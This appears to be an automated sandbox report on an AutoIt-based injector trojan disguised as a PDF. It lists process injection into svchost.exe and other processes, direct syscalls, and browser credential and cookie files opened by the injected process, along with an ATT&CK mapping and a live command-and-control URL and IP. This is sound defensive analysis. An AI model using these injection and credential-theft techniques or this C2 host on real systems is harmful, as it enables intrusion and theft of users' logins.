              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40680 mov eax, dword ptr fs:[00000030h]1_2_03C40680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40680 mov eax, dword ptr fs:[00000030h]1_2_03C40680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40680 mov eax, dword ptr fs:[00000030h]1_2_03C40680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38690 mov eax, dword ptr fs:[00000030h]1_2_03C38690
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC691 mov eax, dword ptr fs:[00000030h]1_2_03CBC691
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF86A8 mov eax, dword ptr fs:[00000030h]1_2_03CF86A8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF86A8 mov eax, dword ptr fs:[00000030h]1_2_03CF86A8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C640 mov eax, dword ptr fs:[00000030h]1_2_03C6C640
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C640 mov eax, dword ptr fs:[00000030h]1_2_03C6C640
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6265C mov eax, dword ptr fs:[00000030h]1_2_03C6265C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6265C mov ecx, dword ptr fs:[00000030h]1_2_03C6265C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6265C mov eax, dword ptr fs:[00000030h]1_2_03C6265C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6666D mov esi, dword ptr fs:[00000030h]1_2_03C6666D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6666D mov eax, dword ptr fs:[00000030h]1_2_03C6666D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6666D mov eax, dword ptr fs:[00000030h]1_2_03C6666D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE660 mov eax, dword ptr fs:[00000030h]1_2_03CBE660
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30670 mov eax, dword ptr fs:[00000030h]1_2_03C30670
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72670 mov eax, dword ptr fs:[00000030h]1_2_03C72670
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72670 mov eax, dword ptr fs:[00000030h]1_2_03C72670
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04600 mov eax, dword ptr fs:[00000030h]1_2_03D04600
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C620 mov eax, dword ptr fs:[00000030h]1_2_03C6C620
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30630 mov eax, dword ptr fs:[00000030h]1_2_03C30630
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60630 mov eax, dword ptr fs:[00000030h]1_2_03C60630
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB8633 mov esi, dword ptr fs:[00000030h]1_2_03CB8633
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB8633 mov eax, dword ptr fs:[00000030h]1_2_03CB8633
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB8633 mov eax, dword ptr fs:[00000030h]1_2_03CB8633
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C5C6 mov eax, dword ptr fs:[00000030h]1_2_03C6C5C6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05C6 mov eax, dword ptr fs:[00000030h]1_2_03CB05C6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C665D0 mov eax, dword ptr fs:[00000030h]1_2_03C665D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A5E7 mov ebx, dword ptr fs:[00000030h]1_2_03C6A5E7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A5E7 mov eax, dword ptr fs:[00000030h]1_2_03C6A5E7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC5FC mov eax, dword ptr fs:[00000030h]1_2_03CBC5FC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE588 mov eax, dword ptr fs:[00000030h]1_2_03CAE588
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE588 mov eax, dword ptr fs:[00000030h]1_2_03CAE588
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A580 mov eax, dword ptr fs:[00000030h]1_2_03C6A580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A580 mov eax, dword ptr fs:[00000030h]1_2_03C6A580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C62594 mov eax, dword ptr fs:[00000030h]1_2_03C62594
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC592 mov eax, dword ptr fs:[00000030h]1_2_03CBC592
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB85AA mov eax, dword ptr fs:[00000030h]1_2_03CB85AA
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C345B0 mov eax, dword ptr fs:[00000030h]1_2_03C345B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C345B0 mov eax, dword ptr fs:[00000030h]1_2_03C345B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E547 mov eax, dword ptr fs:[00000030h]1_2_03C4E547
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C66540 mov eax, dword ptr fs:[00000030h]1_2_03C66540
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68540 mov eax, dword ptr fs:[00000030h]1_2_03C68540
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3254C mov eax, dword ptr fs:[00000030h]1_2_03C3254C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6550 mov eax, dword ptr fs:[00000030h]1_2_03CC6550
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA553 mov eax, dword ptr fs:[00000030h]1_2_03CFA553
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4C560 mov eax, dword ptr fs:[00000030h]1_2_03C4C560
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E507 mov eax, dword ptr fs:[00000030h]1_2_03C5E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E507 mov eax, dword ptr fs:[00000030h]1_2_03C5E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E507 mov eax, dword ptr fs:[00000030h]1_2_03C5E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E507 mov eax, dword ptr fs:[00000030h]1_2_03C5E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E507 mov eax, dword ptr fs:[00000030h]1_2_03C5E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E507 mov eax, dword ptr fs:[00000030h]1_2_03C5E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E507 mov eax, dword ptr fs:[00000030h]1_2_03C5E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E507 mov eax, dword ptr fs:[00000030h]1_2_03C5E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32500 mov eax, dword ptr fs:[00000030h]1_2_03C32500
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C50D mov eax, dword ptr fs:[00000030h]1_2_03C6C50D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C50D mov eax, dword ptr fs:[00000030h]1_2_03C6C50D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC51D mov eax, dword ptr fs:[00000030h]1_2_03CBC51D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4252B mov eax, dword ptr fs:[00000030h]1_2_03C4252B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4252B mov eax, dword ptr fs:[00000030h]1_2_03C4252B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4252B mov eax, dword ptr fs:[00000030h]1_2_03C4252B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4252B mov eax, dword ptr fs:[00000030h]1_2_03C4252B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4252B mov eax, dword ptr fs:[00000030h]1_2_03C4252B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4252B mov eax, dword ptr fs:[00000030h]1_2_03C4252B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4252B mov eax, dword ptr fs:[00000030h]1_2_03C4252B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72539 mov eax, dword ptr fs:[00000030h]1_2_03C72539
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C544D1 mov eax, dword ptr fs:[00000030h]1_2_03C544D1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C544D1 mov eax, dword ptr fs:[00000030h]1_2_03C544D1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E4EF mov eax, dword ptr fs:[00000030h]1_2_03C6E4EF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E4EF mov eax, dword ptr fs:[00000030h]1_2_03C6E4EF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C364F0 mov eax, dword ptr fs:[00000030h]1_2_03C364F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A4F0 mov eax, dword ptr fs:[00000030h]1_2_03C6A4F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A4F0 mov eax, dword ptr fs:[00000030h]1_2_03C6A4F0
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_0037A66C GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_003681AC SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe | Code function: 0_2_00368189 SetUnhandledExceptionFilter

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe  NtDeviceIoControlFile: Direct from: 0x32AC43C
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe  NtCreateThreadEx: Direct from: 0x32AAA88
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe  NtTerminateThread: Direct from: 0x7FF88A502651
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe  NtAllocateVirtualMemory: Direct from: 0x32B7309
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe  NtQueryInformationToken: Direct from: 0x32ABDAD
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe  NtDeviceIoControlFile: Direct from: 0x32B359C
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe  NtDeviceIoControlFile: Direct from: 0x32AC4A9
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe  NtQuerySystemInformation: Direct from: 0x32B34ED
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe  NtProtectVirtualMemory: Direct from: 0x32B3451
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe  NtProtectVirtualMemory: Direct from: 0x32B4AD4
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe  NtDeviceIoControlFile: Direct from: 0x32B3644
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe  NtDelayExecution: Direct from: 0x4743BBA
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe  NtDelayExecution: Direct from: 0x4743D89
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe  NtResumeThread: Direct from: 0x4743E00
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe  NtProtectVirtualMemory: Direct from: 0x474B947
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe  NtDelayExecution: Direct from: 0x32AB682
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe  NtDeviceIoControlFile: Direct from: 0x32AC468
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe  NtClose: Direct from: 0x32B36E2
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe  Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: NULL target: C:\Windows\SysWOW64\newdev.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\newdev.exe  Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read write
              Source: C:\Windows\SysWOW64\newdev.exe  Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\newdev.exe  Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
              Source: C:\Windows\SysWOW64\svchost.exe  Thread register set: target process: 7548
              Source: C:\Windows\SysWOW64\newdev.exe  Thread register set: target process: 7548
              Source: C:\Windows\SysWOW64\svchost.exe  Thread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe  Memory written: C:\Windows\SysWOW64\svchost.exe base: 3077008
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe  Code function: 0_2_0037B106 LogonUserW,0_2_0037B106
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe  Code function: 0_2_00343D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00343D19
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe  Code function: 0_2_0038411C SendInput,keybd_event,0_2_0038411C
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe  Code function: 0_2_003874BB mouse_event,0_2_003874BB
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe  Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe"
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe  Process created: C:\Windows\SysWOW64\newdev.exe "C:\Windows\SysWOW64\newdev.exe"
              Source: C:\Windows\SysWOW64\newdev.exe  Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe  Code function: 0_2_0037A66C GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0037A66C
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe  Code function: 0_2_003871FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_003871FA
              Source: RAVCpl64.exe, 00000002.00000002.11194758898.0000000000D51000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000002.00000000.6499287256.0000000000D51000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Program ManagerpR
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, RAVCpl64.exe, 00000002.00000002.11194758898.0000000000D51000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000002.00000000.6499287256.0000000000D51000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Shell_TrayWnd
              Source: RAVCpl64.exe, 00000002.00000002.11194758898.0000000000D51000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000002.00000000.6499287256.0000000000D51000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Progman
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe  Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
              Source: RAVCpl64.exe, 00000002.00000002.11194758898.0000000000D51000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000002.00000000.6499287256.0000000000D51000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe  Code function: 0_2_003665C4 cpuid 0_2_003665C4
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe  Code function: 0_2_0039091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_0039091D
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe  Code function: 0_2_003BB340 GetUserNameW,0_2_003BB340
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe  Code function: 0_2_00371E8E GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00371E8E
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe  Code function: 0_2_0035DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0035DDC0
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, 00000000.00000002.6129559353.0000000001027000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: mcupdate.exe

              Stealing of Sensitive Information

              Source: Yara match  File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match  File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match  File source: 00000001.00000002.6565186036.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 00000003.00000002.6805063902.0000000004830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 00000001.00000002.6571557042.0000000006630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 00000003.00000002.6804979638.00000000047E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\newdev.exe  File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\newdev.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\SysWOW64\newdev.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\newdev.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\newdev.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
              Source: C:\Windows\SysWOW64\newdev.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
              Source: C:\Windows\SysWOW64\newdev.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
              Source: C:\Windows\SysWOW64\newdev.exe  Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe  Binary or memory string: WIN_81
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe  Binary or memory string: WIN_XP
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe  Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe  Binary or memory string: WIN_XPe
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe  Binary or memory string: WIN_VISTA
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe  Binary or memory string: WIN_7
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe  Binary or memory string: WIN_8

              Remote Access Functionality

              Source: Yara match  File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match  File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match  File source: 00000001.00000002.6565186036.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 00000003.00000002.6805063902.0000000004830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 00000001.00000002.6571557042.0000000006630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 00000003.00000002.6804979638.00000000047E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe  Code function: 0_2_00398C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00398C4F
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe  Code function: 0_2_0039923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_0039923B
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure2
              Valid Accounts
              3
              Native API
              1
              DLL Side-Loading
              1
              Exploitation for Privilege Escalation
              1
              Disable or Modify Tools
              1
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              4
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault AccountsScheduled Task/Job2
              Valid Accounts
              1
              Abuse Elevation Control Mechanism
              1
              Deobfuscate/Decode Files or Information
              21
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              1
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading
              1
              Abuse Elevation Control Mechanism
              Security Account Manager1
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
              Valid Accounts
              3
              Obfuscated Files or Information
              NTDS116
              System Information Discovery
              Distributed Component Object Model21
              Input Capture
              3
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
              Access Token Manipulation
              1
              DLL Side-Loading
              LSA Secrets161
              Security Software Discovery
              SSH3
              Clipboard Data
              Fallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
              Process Injection
              2
              Valid Accounts
              Cached Domain Credentials2
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
              Virtualization/Sandbox Evasion
              DCSync3
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
              Access Token Manipulation
              Proc Filesystem1
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
              Process Injection
              /etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Source  Detection  Scanner  Label  Link
              HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe  47%  ReversingLabs  Win32.Trojan.AutoitInject
              HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe  100%  Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              Source  Detection  Scanner  Label  Link
              http://www.topkapiescortg.xyz/cz1i/?XV=QNGNUsgi9ans25&VT3s=lCWtxBlDPSCNJhRz7147v4YzJ6rIzSVGmK+Kme085vCDtUrqSJqQP+YtwYINSw3lRTDSNZCzyCPLZyeariLf2RdsyM6VIL0C/A8nWtsFZVjXlXjChXabsak=  0%  Avira URL Cloud  safe
              Name  IP  Active  Malicious  Antivirus Detection  Reputation
              www.topkapiescortg.xyz
              172.67.134.42
              true  true
                unknown
                Name  Malicious  Antivirus Detection  Reputation
                http://www.topkapiescortg.xyz/cz1i/?XV=QNGNUsgi9ans25&VT3s=lCWtxBlDPSCNJhRz7147v4YzJ6rIzSVGmK+Kme085vCDtUrqSJqQP+YtwYINSw3lRTDSNZCzyCPLZyeariLf2RdsyM6VIL0C/A8nWtsFZVjXlXjChXabsak=  true
                • Avira URL Cloud: safe
                unknown
                Name  Source  Malicious  Antivirus Detection  Reputation
                https://ac.ecosia.org/autocomplete?q=  newdev.exe, 00000003.00000002.6806932663.0000000007E7F000.00000004.00000020.00020000.00000000.sdmp  false  high
                https://duckduckgo.com/chrome_newtab  newdev.exe, 00000003.00000002.6806932663.0000000007E7F000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6752649694.0000000007EE9000.00000004.00000020.00020000.00000000.sdmp, E8-03HaL.3.dr  false  high
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=  E8-03HaL.3.dr  false  high
                https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search  newdev.exe, 00000003.00000002.6806932663.0000000007E7F000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6752649694.0000000007EE9000.00000004.00000020.00020000.00000000.sdmp, E8-03HaL.3.dr  false  high
                https://duckduckgo.com/ac/?q=  E8-03HaL.3.dr  false  high
                https://www.google.com/images/branding/product/ico/googleg_lodp.ico  newdev.exe, 00000003.00000003.6752649694.0000000007EE9000.00000004.00000020.00020000.00000000.sdmp, E8-03HaL.3.dr  false  high
                https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=  newdev.exe, 00000003.00000003.6752649694.0000000007EE9000.00000004.00000020.00020000.00000000.sdmp, E8-03HaL.3.dr  false  high
                https://www.ecosia.org/newtab/  newdev.exe, 00000003.00000002.6806932663.0000000007E7F000.00000004.00000020.00020000.00000000.sdmp  false  high
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=  newdev.exe, 00000003.00000002.6806932663.0000000007E7F000.00000004.00000020.00020000.00000000.sdmp  false  high
                https://gemini.google.com/app?q=  newdev.exe, 00000003.00000002.6806932663.0000000007E7F000.00000004.00000020.00020000.00000000.sdmp  false  high
                                    IP  Domain  Country  Flag  ASN  ASN Name  Malicious
                                    172.67.134.42  www.topkapiescortg.xyz  United States  13335  CLOUDFLARENETUS  true
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1569166
                                    Start date and time:2024-12-05 15:18:49 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 15m 40s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
